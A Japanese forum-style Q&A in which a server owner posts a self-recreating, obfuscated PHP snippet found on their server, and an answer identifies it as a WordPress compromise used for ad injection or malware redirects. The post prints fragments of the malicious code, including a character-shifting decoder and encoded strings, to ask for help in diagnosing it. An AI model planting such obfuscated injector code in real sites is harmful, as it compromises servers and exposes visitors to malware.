サーバー上のファイルに奇妙なPHPコードが見つかりました

Question

残念ながら、投稿するサイトが間違っています。

基本的に私はサーバーを持っており、このファイルは自分自身を作成し​​続けます。このファイルはPHPファイルであり、コードを含んでいます：

<?php 
    $GLOBALS['XfZi37Vc'] = $_SERVER; 
    function ruexxCV1QobH($uiBP25) 
                  {$MISwZvode = "";global $PYJ9QSAA; 

    for($QNufqz7Oj=intval('fzSxRYkl'); $QNufqz7Oj<strlen($uiBP25); $QNufqz7Oj++) 
      {$yzwxeHjxV = ord($uiBP25[$QNufqz7Oj]) - $QNufqz7Oj - $PYJ9QSAA; 
    if ($yzwxeHjxV < 32){$yzwxeHjxV = $yzwxeHjxV + 94; 

${YkT1GO68Y3rXB("iv[_^/1\"w;%")} = Lp4lS8SSZzAY("-15/*32B.3@@G9CJJ"); 
         ${YkT1GO68Y3rXB(",g0@#&D6x")} = PDeZzowtLQ("kos|n|,ryov1!#4&)!/9-{+%\$"); 
       ${QDVtOC8("pt[v\$:=")} = lpkBre6(":<;)><97C"); 
${fW1u5W74(";q~BY_y{")} = rdfpzT0mw(",:;9=+?3??CF<B<"); 
${sGbDIY("!<!.x\\ze")} = lpkBre6("kos|n|,\$nzxtr(x5~("); 
function rdfpzT0mw($vGoVcwpU){return ruexxCV1QobH($vGoVcwpU);}; 
     function ifUYiZ4bFphW5($NYycJIpl){return ruexxCV1QobH($NYycJIpl);}; 
     ${fW1u5W74("gh\"Co[")} = lpkBre6("*77@0>A-DE6@6C9;"); 
${rdfpzT0mw("n2lZ7t\\")} = QDVtOC8(";:27"); 

これまでにこのようなコードは見たことがありません。誰が正確に何をしているのか教えてもらえますか？

Answer 1

これはあなたのWordpressに起こったハックです。おそらく、古いサードパーティプラグインを使用しているためです。これらは検出するのがやや難しいかもしれませんが、このコードはおそらく広告を配置したり、ユーザーを外部のコンテンツやマルウェアにリダイレクトするために使用されています。

このコードを削除して、すべてのプラグインを更新する必要があります。

このコードでは、Wordpressデータベースにコードを挿入する可能性があることに注意してください。特にWordpressで 'eval'を有効にするプラグインがあれば、意味のあるコードをデータベースから取得してevalすることができます。

問題が解決しない場合は、問題の原因を見つけるまでサードパーティのプラグインを無効にする必要があります。

Wordpressは自動スクリプトの検出が非常に簡単で、サードパーティのプラグインはセキュリティについて知らない人が書いている可能性があります。あなたがWordpress.orgから来ても、あなたはそれらを使用する際に非常に注意する必要があります。